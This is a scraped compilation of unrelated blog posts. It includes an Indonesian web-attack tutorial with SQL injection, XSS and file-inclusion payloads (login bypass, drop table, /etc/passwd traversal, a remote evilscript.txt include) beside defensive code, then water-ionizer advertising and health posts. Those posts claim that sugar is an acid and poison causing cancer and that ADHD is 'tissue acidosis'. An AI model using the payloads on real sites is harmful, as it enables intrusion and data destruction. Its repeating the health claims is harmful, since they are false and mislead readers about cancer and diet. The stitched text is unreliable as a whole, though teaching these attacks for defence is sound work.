Woman And computer
Human And Computer

Blacklists, Clustering and The Matrix

Blacklists are the mainstay of many security technologies protecting enterprise networks today. Despite being used practically everywhere however, many people fail to understand what blacklists actually offer in the realm of protection - and how they're often used as a preemptive protection technology.

Add to that a complementary technology, clustering, which offers more advanced features in the realm of preemptive threat detection (and perhaps "protection") and is used to aid and extend blacklists.

To help explain these technological terms (and what's happening in this field of preemptive technology) I wrote a couple of technical blogs that were published in SC Magazine this week. With a bit of luck you'll find them educational and a bit of fun.

Part One: Blacklists, clustering and The Matrix

Part Two: Blacklists, clustering and The Matrix

Stumble Upon Button

Add this to your blog today!

This little stumble upon button will really help boost your stumbles! It's the little button at the foot of this post with the numbers. I'm in the middle of writing an article for the Folksy Blog all about stumbling and why it's so great for boosting traffic. I had to take a little break to share this!




It shows a live count of the number of stumblers that have visited your site - I added it about an hour ago and I'm loving seeing the numbers leap up.  Apparently the first 15 are just robots (friendly ones!) It's easy to add the code, you just need to amend one tiny bit of html in your template.  Follow the instructions here to add the code  and get your own stumble button. Just go into your dashboard click Design / Html and use Ctrl + F to find the piece of code to change. (Leave me a comment if you get stuck and I'll help you)





Don't forget to stumble Craft Blog UK!



Protecting Website from Common Attacks

------------------------------------------------------/

[-] Title : Protecting website from common attacks

[-] Date : 08-08-2010

[-] Author : vYc0d

[-] Contact : vyc0d@hackermail.com

[-] Web : http://vyc0d.blogspot.com

[-] Language : Indonesian

------------------------------------------------------/



Contents:

[1] Introduction

[2] Cross Site Scripting

[3] SQL Injection

\_ Login Form Bypassing

\_ UNION SQL Injection

[4] File Inclusion

[5] Special Thanks



[1] Introduction

This article covers four common types of web attack, used in most kinds of defacement, and how to prevent them. The five common exploits I list below are XSS, SQL injection, RFI and LFI. Most of the mistakes are programming errors that allow an attacker to break into the website.







[2] Cross Site Scripting



Cross Site Scripting is a type of flaw that attackers use to inject code into web pages that are vulnerable to this attack. If a site is vulnerable to cross site scripting, an attacker will most likely try to inject malicious JavaScript into the site, or try to scam users by creating a near-identical copy of a page in order to obtain information.



Example:

http://www.situs.net/find.php?all=">



*Solution (javascript) :

// Strip characters that are commonly used to build markup or script.
function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
    return strTemp;
}
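Stripping characters also damages legitimate input, so the usual server-side alternative is to keep the value intact and encode it for the place it is written into. The following is an added example, not code from the original article, written in PHP because find.php is a PHP page; it assumes PHP 7.2+, and the function names and sample inputs are constructed for illustration.

```php
<?php
// Added example, not from the original article; function names are hypothetical.

// PHP port of the article's RemoveBad(): delete characters that look dangerous.
function remove_bad(string $s): string {
    return preg_replace('/[<>"\'%;()&+\-]/', '', $s);
}

// HTML element content and quoted attribute values.
function esc_html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// A value placed inside a <script> block: JSON with <, >, &, ' and " hex-escaped.
function esc_js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE);
}

// Fragment of a find.php results page for the "all" query parameter.
// Each output context gets its own encoder.
function render_search(string $term): string {
    return '<input name="all" value="' . esc_html($term) . '">' . "\n"
         . '<p>Results for: ' . esc_html($term) . '</p>' . "\n"
         . '<a href="find.php?all=' . rawurlencode($term) . '&amp;page=2">Next</a>' . "\n"
         . '<script>var term = ' . esc_js($term) . ';</script>';
}

// Constructed inputs: a legitimate query and one that tries to close the attribute.
foreach (['Tom & Jerry (50% off)', '"><b>injected</b>'] as $term) {
    echo "stripped: ", remove_bad($term), "\n";
    echo render_search($term), "\n\n";
}
```

The first input shows what the stripping approach costs a legitimate search; the second shows the markup arriving in the page as inert text in every context.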







[3] SQL Injection



*\_ Login Form Bypassing



Here is an example of code that we can bypass:



index.html file:



Password:








login.php file:

<?php
// Example code (vulnerable: the posted value is concatenated straight into the query)
$execute = "SELECT * from database WHERE password = '{$_POST['pass']}'";
$result = mysql_query($execute);
?>




We can bypass it by using ' or '1=1', which executes "password = ''or '1=1'';".

Alternatively, the attacker can delete the database by running "' drop table database; --".



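*Solution :

Use mysql_real_escape_string

Example:

<?php
// Note: the mysql_* functions were removed in PHP 7.0; this needs PHP 5 and an open connection.
$badcode = "' OR 1 '";
// Escape quotes and other special characters before the value goes into the query.
$badcode = mysql_real_escape_string($badcode);
$message = "SELECT * from database WHERE password = '$badcode'";
echo "what are doing nobs " . $message;
?>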





*\_ Union SQL Injection



Union SQL injection is when the user uses the UNION command. The flaw is checked for by appending to the end of a ".php?id=" URL. If a MySQL error appears, the site is most likely vulnerable to UNION SQL injection. The attacker then goes on to use ORDER BY to find the columns and, finally, uses the UNION ALL SELECT command.



Example:

http://www.situs.net/index.php?id=1'

one example of an error message:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in.....

Once the error message appears, the attacker carries on ;))

http://www.situs.net/index.php?id=1 ORDER BY 1-- <-- No error.

http://www.situs.net/index.php?id=1 ORDER BY 2-- <-- An error message appears. This means there is only one column

http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()-- <-- Selects all columns and runs the version() command.



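*Solution :

Add something like the following to prevent UNION SQL injection:

// eregi_replace() was removed in PHP 7.0; preg_replace() with the i flag is the equivalent.
// "/*" is written as /\* so that it matches the literal comment opener.
$bug = '~(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/\*)|(select)~i';
$patch = preg_replace($bug, "", $patch);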
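One block for both SQL injection cases above (the login form and the id= parameter), as an added example that is not part of the original article: a prepared statement binds the input as a value, so it is never parsed as SQL and no keyword list is needed. It assumes PHP 7+ with the pdo_sqlite extension and an in-memory database; the users and news tables, their rows and the function names are constructed for the demonstration.

```php
<?php
// Added example, not from the original article. Assumes PHP 7+ with pdo_sqlite;
// the tables, rows and function names are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, password TEXT)");
$db->exec("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO users (password) VALUES ('s3cret')");
$db->exec("INSERT INTO news (id, title) VALUES (1, 'Site launched')");

// The article's pattern: the input becomes part of the SQL text.
function login_concat(PDO $db, string $pass): bool {
    $sql = "SELECT id FROM users WHERE password = '$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Prepared statement: the input is bound as a value and is never parsed as SQL.
// (The plain-text password column mirrors the article's query; production code
// stores password_hash() output and checks it with password_verify().)
function login_bound(PDO $db, string $pass): bool {
    $stmt = $db->prepare("SELECT id FROM users WHERE password = :pass");
    $stmt->execute([':pass' => $pass]);
    return $stmt->fetch() !== false;
}

// index.php?id=... : accept digits only, then bind the value as an integer.
function news_title(PDO $db, string $rawId): ?string {
    if (!ctype_digit($rawId)) {
        return null;   // anything other than a plain number is rejected here
    }
    $stmt = $db->prepare("SELECT title FROM news WHERE id = :id");
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $title = $stmt->fetchColumn();
    return $title === false ? null : $title;
}

$input = "' or '1=1";   // the input quoted in the article
printf("concatenated login accepts it: %s\n", var_export(login_concat($db, $input), true));
printf("bound login accepts it:        %s\n", var_export(login_bound($db, $input), true));

// The id values shown in the article's example URLs, plus a valid one.
foreach (['1', "1'", '1 ORDER BY 2--'] as $id) {
    printf("id=%-16s => %s\n", $id, var_export(news_title($db, $id), true));
}
```

Unlike the keyword filter, the bound version leaves words such as "update" or "select" in legitimate input untouched.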








[4] File Inclusion



\_ Remote File Inclusion and Local File Inclusion

Remote File Inclusion is a flaw where the site lets an attacker include a file from outside the server. Local File Inclusion is a flaw in the site where an attacker can access any file on the server through nothing more than the URL.



Example of vulnerable code:

<?php
// Vulnerable: the file to include is taken directly from the URL.
include($_GET['page']);
?>

Some example attacks:

http://www.situs.net/page.php?page=../../../../../etc/passwd < LFI example

http://www.situs.net/page.php?page=http://www.site.com/evilscript.txt? < RFI example



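*Solution :

Validate the input.

<?php
$page = $_GET['page'] ?? '';
// Only these files may ever be included.
$allowed = array('index.php', 'games.php', 'ip.php');
$iplogger = 'ip.php';

if (in_array($page, $allowed, true)) {
    include $page;
} else {
    // Anything not on the list: run the IP logger and stop.
    include $iplogger;
    die("IP logged.");
}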








[5] Special Thanks



[-] Allah SWT, Muhammad SAW

[-] The big Family of :

[-] M0slem Hax0r - Echo - Indonesian Coder - Jasakom - Indonesian Hackers - Malang Cyber Crew

[-] ManadoCoding - Devilzc0de - Yogyacarderlink - Xcode - Hacker Newbie

[-] Klix ITN Malang - Kolam (Komunitas Linux Arek Malang)



Mirror : http://www.exploit-db.com/papers/14577/



Alienware Cross Fire National Tournament 2010

After officially launching the latest Alienware product, which has been a phenomenon among gamers, Dell Indonesia is holding an online game competition, the "Alienware Cross Fire National Tournament 2010".

Since February 2010, Alienware has been in 15 major Indonesian cities to kick off this cutting-edge, international-level game competition. Dell's all-out mission to support the Indonesian gaming community has produced very surprising results.

As many as 180 teams battled it out in agility, speed and cleverness to bring down their opponents in the game Cross Fire. In the end, the 4 best teams beat the other participants and went on to the final round, competing for the very tempting Alienware M11X.

The final round, held from 6 to 8 August 2010 at Mal Pluit Junction - Jakarta, will decide which team takes the champion's title. Besides the Alienware M11X, the winner of this competition also receives full sponsorship and full accommodation to take part in various game competitions at national, regional and international level throughout 2010.

"Through this exciting competition, which appeals not only to hard core gamers, other people too can enjoy Alienware's most innovative experience in an HD display with high graphics performance, automatically delivering an amazing visual experience wherever they are," said Willy Hendrajudo, Marketing Manager, Dell Consumer Business Indonesia.

Great New feature from Twitter! Who to follow???

Who to follow on Twitter???


 
Exciting new stuff to help you find exactly who to follow on twitter - and it's actually from twitter this time...


"With more than a hundred million users on Twitter, there are sure to be at least dozens of accounts out there that will reflect your interests. The trouble is finding all of them. Today we're beginning to roll out a simple, but powerful new feature to help address that -- "Suggestions for You". The algorithms in this feature, built by our user relevance team, suggest people you don't currently follow that you may find interesting. The suggestions are based on several factors, including people you follow and the people they follow. You'll see these suggestions on Twitter.com and the Find People section. If you like a suggestion, click "follow"; if you don't, click "hide," and we'll try not to suggest that user again." (Twitter Blog)
So I signed out of tweet deck to take a look! Apparently they are launching an API so that third parties can add this too - so I don't have to spend too long away from tweet deck, I'm guessing there'll be a new release out soon - yet another column...

It's really just like the little friend suggestion boxes that facebook have.


The Best Water Ionizer for Alkaline Electron Rich Water?


As you may know the Japanese, Taiwanese and Koreans have been studying ionized electron rich water for decades. Because of research studies and lab reports not translated into english, most Americans miss out on documented proof validating the efficacy of our pH Miracle Mark I ionizer.


We just received a translated lab report showing we truly have the best water ionizer in the market that creates the wettest water or microclustered water.


All water ionizer brands claim their water is microclustered. Please DO NOT fall for this "teabag demonstration!" It is not anywhere near an accurate way to prove microclustering.


The main way to test microclustering is with an NMRI test which costs upwards of $70,000.00!


We have done this NMRI multiple times!


Our latest tests have shown the following:


Tap water from Nagasaki, Japan, measured at 105 hertz. Translated this means the molecular structure is approximately 16 -18 water molecules per cluster. This would be the same as ALL bottled waters being sold on the US and International market.


The pH Miracle Mark I ionizer at 9.5 PH setting measured at 47 hertz. Translated this means the molecule structure is approximately 6-8 molecules per cluster.

For those who are new to the term "Microclustering" it is simply a smaller water molecule that can better penetrate and hydrate the cells. Microclustering is easily 1/3 of the power and effectiveness of the pH Miracle Mark I ionized water. Microclustering will help minerals and other alkalizing supplements adsorb and absorb quickly and more efficiently.


If you are thinking of purchasing a water ionizer then purchase the best - The pH Miracle Mark I ionizer.


To order your water ionizer today go to:


Dr. Young's Research Validated - Fruit Sugars Cause Pancreatic Cancer

I have been sharing my research for over 30 years that sugar causes cancer and that high sugar fructose from fruits, including corn causes cancer. Corn and corn sugar is one of my top ten foods never to eat - and corn syrup is in many foods and drinks. Are you listening?

Sugar is an acid and causes cancer! All sugars including agave, stevia, maple syrup, cane sugar, corn syrup, fructose, glucose, dextrose, sucrose, and all artificial sweeteners as well are acidic and toxic to the human or animal body.

Sugar is a drug. Sugar is an acid. Sugar is a neurotoxin. Sugar is a poison. Sugar is a metabolic waste product. Sugar is a metabolite of cellular degeneration. If you eat sugar in any form it will make you sick, tired and fat and eventually kill you.

Finally my research has been validated. Sugar/fructose from fruit causes pancreatic cancer.

There is no such thing as an alkaline sweetener. They are all acidic and toxic to the body.

There is sugar in every food which comes from the fermentation or breakdown of that food. Sugar is the urine of fermentation. Stop eating it now if you are truly in...



WASHINGTON - Pancreatic tumor cells use fructose to divide and proliferate, U.S. researchers said on Monday in a study that challenges the common wisdom that all sugars are the same.
Tumor cells fed both glucose and fructose used the two sugars in two different ways, the team at the University of California Los Angeles found.



They said their finding, published in the journal Cancer Research, may help explain other studies that have linked fructose intake with pancreatic cancer, one of the deadliest cancer types.
"These findings show that cancer cells can readily metabolize fructose to increase proliferation," Dr. Anthony Heaney of UCLA's Jonsson Cancer Center and colleagues wrote.



"They have major significance for cancer patients given dietary refined fructose consumption, and indicate that efforts to reduce refined fructose intake or inhibit fructose-mediated actions may disrupt cancer growth."



Americans take in large amounts of fructose, mainly in high fructose corn syrup, a mix of fructose and glucose that is used in soft drinks, bread and a range of other foods.



Politicians, regulators, health experts and the industry have debated whether high fructose corn syrup and other ingredients have been helping make Americans fatter and less healthy.



Too much sugar of any kind not only adds pounds, but is also a key culprit in diabetes, heart disease and stroke, according to the American Heart Association.



Several states, including New York and California, have weighed a tax on sweetened soft drinks to defray the cost of treating obesity-related diseases such as heart disease, diabetes and cancer.

The American Beverage Association, whose members include Coca-Cola and Kraft Foods have strongly, and successfully, opposed efforts to tax soda.



The industry has also argued that sugar is sugar.



Heaney said his team found otherwise. They grew pancreatic cancer cells in lab dishes and fed them both glucose and fructose.



Tumor cells thrive on sugar but they used the fructose to proliferate. "Importantly, fructose and glucose metabolism are quite different," Heaney's team wrote.



"I think this paper has a lot of public health implications. Hopefully, at the federal level there will be some effort to step back on the amount of high fructose corn syrup in our diets," Heaney said in a statement.



Now the team hopes to develop a drug that might stop tumor cells from making use of fructose.



U.S. consumption of high fructose corn syrup went up 1,000 percent between 1970 and 1990, researchers reported in 2004 in the American Journal of Clinical Nutrition.

An Acid Western Diet Linked To ADHD

A new study from Perth's Telethon Institute for Child Health Research shows an association between ADHD and an acidic 'Western-style' diet in adolescents.


The research findings have just been published online in the international Journal of Attention Disorders.


Leader of Nutrition studies at the Institute, Associate Professor Wendy Oddy, said the study examined the dietary patterns of 1800 adolescents from the long-term Raine Study and classified diets into 'Healthy' or 'Western' or 'Acid' patterns.


"We found a diet high in the Western pattern of foods was associated with more than double the risk of having an ADHD diagnosis compared with a diet low in the Western pattern, after adjusting for numerous other social and family influences," Dr Oddy said.

"We looked at the dietary patterns amongst the adolescents and compared the diet information against whether or not the adolescent had received a diagnosis of ADHD by the age of 14 years. In our study, 115 adolescents had been diagnosed with ADHD, 91 boys and 24 girls." A "healthy" pattern is a diet high in fresh fruit and vegetables, whole grains and fish. It tends to be higher in omega-3 fatty acids, folate and fibre. A "Western" pattern is a diet with a trend towards takeaway foods, confectionery, processed, fried and refined foods. These diets tend to be higher in total fat, saturated fat, refined sugar and sodium.

"When we looked at specific foods, having an ADHD diagnosis was associated with a diet high in takeaway foods, processed meats, red meat, high fat dairy products and confectionery," Dr Oddy said.

"We suggest that a Western dietary pattern may indicate the adolescent has a less optimal fatty acid profile, whereas a diet higher in omega-3 fatty acids is thought to hold benefits for mental health and optimal brain function.

"It also may be that the Western dietary pattern doesn't provide enough essential micronutrients that are needed for brain function, particularly attention and concentration, or that a Western diet might contain more colours, flavours and additives that have been linked to an increase in ADHD symptoms. It may also be that impulsivity, which is a characteristic of ADHD, leads to poor dietary choices such as quick snacks when hungry."

Dr Oddy said that whilst this study suggests that diet may be implicated in ADHD, more research is needed to determine the nature of the relationship.

"This is a cross-sectional study so we cannot be sure whether a poor diet leads to ADHD or whether ADHD leads to poor dietary choices and cravings," Dr Oddy said.

ADHD is the most commonly diagnosed childhood mental health disorder and has a prevalence of approximately 5%. ADHD is known to be more common in boys.

According to Dr. Robert O. Young, Director of Research at the pH Miracle Living Center, "ADHD is a classic condition of tissue acidosis, low urine pH and bowel constipation due to the ingestion of highly acidic foods, such as beef, chicken, pork, eggs and dairy."
